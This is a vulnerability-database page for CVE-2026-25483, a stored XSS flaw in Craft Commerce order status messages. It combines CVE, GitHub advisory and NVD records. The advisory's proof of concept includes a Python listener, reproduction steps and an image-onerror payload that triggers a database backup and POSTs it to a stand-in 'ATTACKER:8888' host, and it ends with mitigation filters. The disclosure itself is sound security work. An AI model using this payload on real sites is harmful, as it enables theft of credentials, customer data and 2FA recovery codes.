Vulnerability-Lookup

CVE-2026-25483 (GCVE-0-2026-25483)

Vulnerability from cvelistv5 – Published: 2026-02-03 18:05 – Updated: 2026-02-04 16:51

Title

Craft Commerce has Stored XSS via Order Status Message with potential database exfiltration

Summary

Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability exists in Craft Commerce’s Order Status History Message. The message is rendered using the |md filter, which permits raw HTML, enabling malicious script execution. If a user has database backup utility permissions (which do not require an elevated session), an attacker can exfiltrate the entire database, including all user credentials, customer PII, order history, and 2FA recovery codes. This issue has been patched in versions 4.10.1 and 5.5.2.

Severity ?

6.2 (Medium)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/craftcms/commerce/security/adv…	x_refsource_CONFIRM
	https://github.com/craftcms/commerce/commit/4665a…	x_refsource_MISC
	https://github.com/craftcms/commerce/releases/tag…	x_refsource_MISC
	https://github.com/craftcms/commerce/releases/tag/5.5.2	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	craftcms	commerce	Affected: >= 4.0.0-RC1, < 4.10.1 Affected: >= 5.0.0, < 5.5.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-25483",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-04T15:46:22.023688Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-04T16:51:19.008Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "commerce",
          "vendor": "craftcms",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 4.0.0-RC1, \u003c 4.10.1"
            },
            {
              "status": "affected",
              "version": "\u003e= 5.0.0, \u003c 5.5.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability exists in Craft Commerce\u2019s Order Status History Message. The message is rendered using the |md filter, which permits raw HTML, enabling malicious script execution. If a user has database backup utility permissions (which do not require an elevated session), an attacker can exfiltrate the entire database, including all user credentials, customer PII, order history, and 2FA recovery codes. This issue has been patched in versions 4.10.1 and 5.5.2."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 6.2,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "LOW",
            "userInteraction": "PASSIVE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-03T18:05:49.411Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/craftcms/commerce/security/advisories/GHSA-8478-rmjg-mjj5",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/craftcms/commerce/security/advisories/GHSA-8478-rmjg-mjj5"
        },
        {
          "name": "https://github.com/craftcms/commerce/commit/4665a47c0961aee311a42af2ff94a7c470f0ad8c",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/craftcms/commerce/commit/4665a47c0961aee311a42af2ff94a7c470f0ad8c"
        },
        {
          "name": "https://github.com/craftcms/commerce/releases/tag/4.10.1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/craftcms/commerce/releases/tag/4.10.1"
        },
        {
          "name": "https://github.com/craftcms/commerce/releases/tag/5.5.2",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/craftcms/commerce/releases/tag/5.5.2"
        }
      ],
      "source": {
        "advisory": "GHSA-8478-rmjg-mjj5",
        "discovery": "UNKNOWN"
      },
      "title": "Craft Commerce has Stored XSS via Order Status Message with potential database exfiltration"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-25483",
    "datePublished": "2026-02-03T18:05:49.411Z",
    "dateReserved": "2026-02-02T16:31:35.821Z",
    "dateUpdated": "2026-02-04T16:51:19.008Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-25483\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-03T19:16:25.717\",\"lastModified\":\"2026-02-10T17:52:55.530\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability exists in Craft Commerce\u2019s Order Status History Message. The message is rendered using the |md filter, which permits raw HTML, enabling malicious script execution. If a user has database backup utility permissions (which do not require an elevated session), an attacker can exfiltrate the entire database, including all user credentials, customer PII, order history, and 2FA recovery codes. This issue has been patched in versions 4.10.1 and 5.5.2.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":6.2,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"PASSIVE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"LOW\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.3,\"impactScore\":2.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:craftcms:craft_commerce:*:*:*:*:*:craft_cms:*:*\",\"versionStartIncluding\":\"4.0.1\",\"versionEndExcluding\":\"4.10.1\",\"matchCriteriaId\":\"6EFA9347-254D-4D9E-84B1-8C0FFCC377F9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:craftcms:craft_commerce:*:*:*:*:*:craft_cms:*:*\",\"versionStartIncluding\":\"5.0.0\",\"versionEndExcluding\":\"5.5.2\",\"matchCriteriaId\":\"65ADAE4B-A19C-4FB1-AE39-8CF4AF57499B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:craftcms:craft_commerce:4.0.0:-:*:*:*:craft_cms:*:*\",\"matchCriteriaId\":\"2B409639-1C00-4E9C-950E-77058C40A5F1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:craftcms:craft_commerce:4.0.0:rc1:*:*:*:craft_cms:*:*\",\"matchCriteriaId\":\"E4B4BB43-0D60-4F6F-9F6F-1F7B3AF75EBA\"}]}]}],\"references\":[{\"url\":\"https://github.com/craftcms/commerce/commit/4665a47c0961aee311a42af2ff94a7c470f0ad8c\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/craftcms/commerce/releases/tag/4.10.1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/craftcms/commerce/releases/tag/5.5.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/craftcms/commerce/security/advisories/GHSA-8478-rmjg-mjj5\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\",\"Patch\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-25483\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-04T15:46:22.023688Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-04T15:46:23.252Z\"}}], \"cna\": {\"title\": \"Craft Commerce has Stored XSS via Order Status Message with potential database exfiltration\", \"source\": {\"advisory\": \"GHSA-8478-rmjg-mjj5\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 6.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"LOW\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"craftcms\", \"product\": \"commerce\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 4.0.0-RC1, \u003c 4.10.1\"}, {\"status\": \"affected\", \"version\": \"\u003e= 5.0.0, \u003c 5.5.2\"}]}], \"references\": [{\"url\": \"https://github.com/craftcms/commerce/security/advisories/GHSA-8478-rmjg-mjj5\", \"name\": \"https://github.com/craftcms/commerce/security/advisories/GHSA-8478-rmjg-mjj5\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/craftcms/commerce/commit/4665a47c0961aee311a42af2ff94a7c470f0ad8c\", \"name\": \"https://github.com/craftcms/commerce/commit/4665a47c0961aee311a42af2ff94a7c470f0ad8c\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/craftcms/commerce/releases/tag/4.10.1\", \"name\": \"https://github.com/craftcms/commerce/releases/tag/4.10.1\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/craftcms/commerce/releases/tag/5.5.2\", \"name\": \"https://github.com/craftcms/commerce/releases/tag/5.5.2\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability exists in Craft Commerce\\u2019s Order Status History Message. The message is rendered using the |md filter, which permits raw HTML, enabling malicious script execution. If a user has database backup utility permissions (which do not require an elevated session), an attacker can exfiltrate the entire database, including all user credentials, customer PII, order history, and 2FA recovery codes. This issue has been patched in versions 4.10.1 and 5.5.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-03T18:05:49.411Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-25483\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-04T16:51:19.008Z\", \"dateReserved\": \"2026-02-02T16:31:35.821Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-03T18:05:49.411Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-8478-RMJG-MJJ5

Vulnerability from github – Published: 2026-02-02 22:43 – Updated: 2026-02-03 21:39

Summary

Craft Commerce has Stored XSS via Order Status Message with potential database exfiltration

Details

Summary

A stored XSS vulnerability exists in Craft Commerce’s Order Status History Message. The message is rendered using the |md filter, which permits raw HTML, enabling malicious script execution. If a user has database backup utility permissions (which do not require an elevated session), an attacker can exfiltrate the entire database, including all user credentials, customer PII, order history, and 2FA recovery codes.

Users are recommended to update to the patched 5.5.2 release to mitigate the issue.

Proof of Concept

Required Permissions

General
- Access the control panel
- Access Craft Commerce
- Access to the database backup utility
Craft Commerce
- Manage orders
- Edit orders

Attacker Server Setup

To reproduce this attack, you need a server to receive the exfiltrated database. 1. Save the Python script as receiver.py on your attacker machine. 2. Run it: python3 receiver.py -- Change the port if needed.

Server Python Script

#!/usr/bin/env python3
"""
Usage: python3 receiver.py
"""

from http.server import HTTPServer, BaseHTTPRequestHandler
import cgi, os
from datetime import datetime

class Handler(BaseHTTPRequestHandler):
    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Methods', 'POST')
        self.end_headers()

    def do_POST(self):
        self.send_response(200)
        self.send_header('Access-Control-Allow-Origin', '*')
        self.end_headers()

        content_type = self.headers.get('Content-Type', '')
        if 'multipart/form-data' in content_type:
            form = cgi.FieldStorage(
                fp=self.rfile, headers=self.headers,
                environ={'REQUEST_METHOD': 'POST', 'CONTENT_TYPE': content_type}
            )
            if 'db' in form:
                filename = f"exfil_{datetime.now().strftime('%Y%m%d_%H%M%S')}.sql.zip"
                with open(filename, 'wb') as f:
                    f.write(form['db'].file.read())
                print(f"[+] DB saved: {filename} ({os.path.getsize(filename):,} bytes)")

        self.wfile.write(b"OK")

if __name__ == '__main__':
    print("[*] Listening on http://0.0.0.0:8888")   # change the port if needed
    HTTPServer(('0.0.0.0', 8888), Handler).serve_forever()

Steps to Reproduce

Log in to the admin panel
Navigate to Commerce → Orders
Create a new order, enter a customer email, and mark the order as completed. The Order should be saved now; if not, save it.
Edit the order
Change the order status, a new text field (Status Message) will appear once the status is changed
- Make sure you have multiple order statuses; if not, create one from (/admin/commerce/settings/orderstatuses)
In the Status Message field, enter the XSS payload below
Save/Update the order
Log out & log in again with an admin account
Visit the order page (/admin/commerce/orders/{Order_ID})
XSS executes → Full database backup is triggered and exfiltrated
Go back to the attacker’s server and notice a zipped file containing the full exfiltrated database.

XSS Payload (DB Exfiltration)

Note: Replace ATTACKER:8888 with your listener server.

<img src=x onerror="fetch('/index.php?p=admin/actions/utilities/db-backup-perform-action',{method:'POST',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:'action=utilities/db-backup-perform-action&CRAFT_CSRF_TOKEN='+Craft.csrfTokenValue+'&downloadBackup=1'}).then(r=>r.blob()).then(b=>{let f=new FormData;f.append('db',b,'backup.sql');fetch('http://ATTACKER:8888/',{method:'POST',body:f})})">

Technical Details (Vulnerable Code)

File: vendor/craftcms/commerce/src/templates/orders/_history.twig Sink: {{ orderHistory.message | md }} Root Cause: The |md Twig filter (Markdown) processes the message but does not sanitize HTML tags.

Impact

The exfiltrated database backup includes, but is not limited to: - Usernames, emails, and password hashes. - Customer PII: Names, addresses, and complete order history. - Transaction records, customer profiles, and coupon codes. - GraphQL tokens. - 2FA recovery codes. - Potentially, payment gateway secrets (if stored directly instead of using environment variables).

Note: This XSS can also be leveraged for the same attacks described in previous reports, including privilege escalation and forced password changes.

Mitigation

Sanitize the message before rendering:

{{ orderHistory.message | md | purify }}

Or escape HTML before Markdown processing:

{{ orderHistory.message | e | md }}

Additionally, requiring an elevated session for the DB Backup utility would increase the difficulty of exploitation, although it would not prevent the attack, as it might occur while an active elevated session is in place.

Resources:

https://github.com/craftcms/commerce/commit/4665a47c0961aee311a42af2ff94a7c470f0ad8c

Severity ?

6.2 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.5.1"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/commerce"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.5.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.10.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/commerce"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0-RC1"
            },
            {
              "fixed": "4.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25483"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-02T22:43:00Z",
    "nvd_published_at": "2026-02-03T19:16:25Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nA stored XSS vulnerability exists in Craft Commerce\u2019s Order Status History Message. The message is rendered using the `|md` filter, which permits raw HTML, enabling malicious script execution. If a user has database backup utility permissions (which do not require an elevated session), an attacker can exfiltrate the entire database, including all user credentials, customer PII, order history, and 2FA recovery codes.\n\nUsers are recommended to update to the patched 5.5.2 release to mitigate the issue.\n\n---\n## Proof of Concept\n\n### Required Permissions\n\n- General\n\t- Access the control panel\n\t- Access Craft Commerce\n\t- Access to the database backup utility\n- Craft Commerce\n\t- Manage orders\n\t- Edit orders\n\n### Attacker Server Setup\n\nTo reproduce this attack, you need a server to receive the exfiltrated database.\n1. Save the Python script as `receiver.py` on your attacker machine.\n2. Run it: `python3 receiver.py` -- Change the port if needed.\n\n\u003cdetails\u003e\n\n\u003csummary\u003eServer Python Script\u003c/summary\u003e\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nUsage: python3 receiver.py\n\"\"\"\n\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nimport cgi, os\nfrom datetime import datetime\n\nclass Handler(BaseHTTPRequestHandler):\n    def do_OPTIONS(self):\n        self.send_response(200)\n        self.send_header(\u0027Access-Control-Allow-Origin\u0027, \u0027*\u0027)\n        self.send_header(\u0027Access-Control-Allow-Methods\u0027, \u0027POST\u0027)\n        self.end_headers()\n\n    def do_POST(self):\n        self.send_response(200)\n        self.send_header(\u0027Access-Control-Allow-Origin\u0027, \u0027*\u0027)\n        self.end_headers()\n        \n        content_type = self.headers.get(\u0027Content-Type\u0027, \u0027\u0027)\n        if \u0027multipart/form-data\u0027 in content_type:\n            form = cgi.FieldStorage(\n                fp=self.rfile, headers=self.headers,\n                environ={\u0027REQUEST_METHOD\u0027: \u0027POST\u0027, \u0027CONTENT_TYPE\u0027: content_type}\n            )\n            if \u0027db\u0027 in form:\n                filename = f\"exfil_{datetime.now().strftime(\u0027%Y%m%d_%H%M%S\u0027)}.sql.zip\"\n                with open(filename, \u0027wb\u0027) as f:\n                    f.write(form[\u0027db\u0027].file.read())\n                print(f\"[+] DB saved: {filename} ({os.path.getsize(filename):,} bytes)\")\n        \n        self.wfile.write(b\"OK\")\n\nif __name__ == \u0027__main__\u0027:\n    print(\"[*] Listening on http://0.0.0.0:8888\")   # change the port if needed\n    HTTPServer((\u00270.0.0.0\u0027, 8888), Handler).serve_forever()\n```\n\n\u003c/details\u003e\n\n### Steps to Reproduce\n\n1. Log in to the admin panel\n2. Navigate to **Commerce** \u2192 **Orders**\n3. Create a new order, enter a customer email, and mark the order as completed. The Order should be saved now; if not, save it.\n4. Edit the order\n5. Change the order status, a new text field (Status Message) will appear once the status is changed\n    - Make sure you have multiple order statuses; if not, create one from (/admin/commerce/settings/orderstatuses)\n6. In the **Status Message** field, enter the XSS payload below\n7. Save/Update the order\n8. Log out \u0026 log in again with an admin account\n9. Visit the order page (/admin/commerce/orders/{Order_ID})\n10. XSS executes \u2192 Full database backup is triggered and exfiltrated\n11. Go back to the attacker\u2019s server and notice a zipped file containing the full exfiltrated database.\n\n### XSS Payload (DB Exfiltration)\n\n**Note:** Replace `ATTACKER:8888` with your listener server.\n```html\n\u003cimg src=x onerror=\"fetch(\u0027/index.php?p=admin/actions/utilities/db-backup-perform-action\u0027,{method:\u0027POST\u0027,headers:{\u0027Content-Type\u0027:\u0027application/x-www-form-urlencoded\u0027},body:\u0027action=utilities/db-backup-perform-action\u0026CRAFT_CSRF_TOKEN=\u0027+Craft.csrfTokenValue+\u0027\u0026downloadBackup=1\u0027}).then(r=\u003er.blob()).then(b=\u003e{let f=new FormData;f.append(\u0027db\u0027,b,\u0027backup.sql\u0027);fetch(\u0027http://ATTACKER:8888/\u0027,{method:\u0027POST\u0027,body:f})})\"\u003e\n```\n\n---\n## Technical Details (Vulnerable Code)\n\n**File:** `vendor/craftcms/commerce/src/templates/orders/_history.twig`\n**Sink:** `{{ orderHistory.message | md }}`\n**Root Cause:** The `|md` Twig filter (Markdown) processes the message but does not sanitize HTML tags.\n\n---\n## Impact\n\nThe exfiltrated database backup includes, but is not limited to:\n- Usernames, emails, and password hashes.\n- Customer PII: Names, addresses, and complete order history.\n- Transaction records, customer profiles, and coupon codes.\n- GraphQL tokens.\n- 2FA recovery codes.\n- Potentially, payment gateway secrets (if stored directly instead of using environment variables).\n\n**Note:** This XSS can also be leveraged for the same attacks described in previous reports, including privilege escalation and forced password changes.\n\n---\n## Mitigation\n\nSanitize the message before rendering:\n```twig\n{{ orderHistory.message | md | purify }}\n```\n\nOr escape HTML before Markdown processing:\n```twig\n{{ orderHistory.message | e | md }}\n```\n\nAdditionally, requiring an elevated session for the DB Backup utility would increase the difficulty of exploitation, although it would not prevent the attack, as it might occur while an active elevated session is in place.\n\n## Resources:\n\nhttps://github.com/craftcms/commerce/commit/4665a47c0961aee311a42af2ff94a7c470f0ad8c",
  "id": "GHSA-8478-rmjg-mjj5",
  "modified": "2026-02-03T21:39:59Z",
  "published": "2026-02-02T22:43:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/security/advisories/GHSA-8478-rmjg-mjj5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25483"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/commit/4665a47c0961aee311a42af2ff94a7c470f0ad8c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/commerce"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/releases/tag/4.10.1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/releases/tag/5.5.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Craft Commerce has Stored XSS via Order Status Message with potential database exfiltration"
}

FKIE_CVE-2026-25483

Vulnerability from fkie_nvd - Published: 2026-02-03 19:16 - Updated: 2026-02-10 17:52

Severity ?

5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/craftcms/commerce/commit/4665a47c0961aee311a42af2ff94a7c470f0ad8c	Patch
security-advisories@github.com	https://github.com/craftcms/commerce/releases/tag/4.10.1	Release Notes
security-advisories@github.com	https://github.com/craftcms/commerce/releases/tag/5.5.2	Release Notes
security-advisories@github.com	https://github.com/craftcms/commerce/security/advisories/GHSA-8478-rmjg-mjj5	Exploit, Vendor Advisory, Patch

Impacted products

Vendor	Product	Version
craftcms	craft_commerce	*
craftcms	craft_commerce	*
craftcms	craft_commerce	4.0.0
craftcms	craft_commerce	4.0.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:craftcms:craft_commerce:*:*:*:*:*:craft_cms:*:*",
              "matchCriteriaId": "6EFA9347-254D-4D9E-84B1-8C0FFCC377F9",
              "versionEndExcluding": "4.10.1",
              "versionStartIncluding": "4.0.1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:craftcms:craft_commerce:*:*:*:*:*:craft_cms:*:*",
              "matchCriteriaId": "65ADAE4B-A19C-4FB1-AE39-8CF4AF57499B",
              "versionEndExcluding": "5.5.2",
              "versionStartIncluding": "5.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:craftcms:craft_commerce:4.0.0:-:*:*:*:craft_cms:*:*",
              "matchCriteriaId": "2B409639-1C00-4E9C-950E-77058C40A5F1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:craftcms:craft_commerce:4.0.0:rc1:*:*:*:craft_cms:*:*",
              "matchCriteriaId": "E4B4BB43-0D60-4F6F-9F6F-1F7B3AF75EBA",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability exists in Craft Commerce\u2019s Order Status History Message. The message is rendered using the |md filter, which permits raw HTML, enabling malicious script execution. If a user has database backup utility permissions (which do not require an elevated session), an attacker can exfiltrate the entire database, including all user credentials, customer PII, order history, and 2FA recovery codes. This issue has been patched in versions 4.10.1 and 5.5.2."
    }
  ],
  "id": "CVE-2026-25483",
  "lastModified": "2026-02-10T17:52:55.530",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.4,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
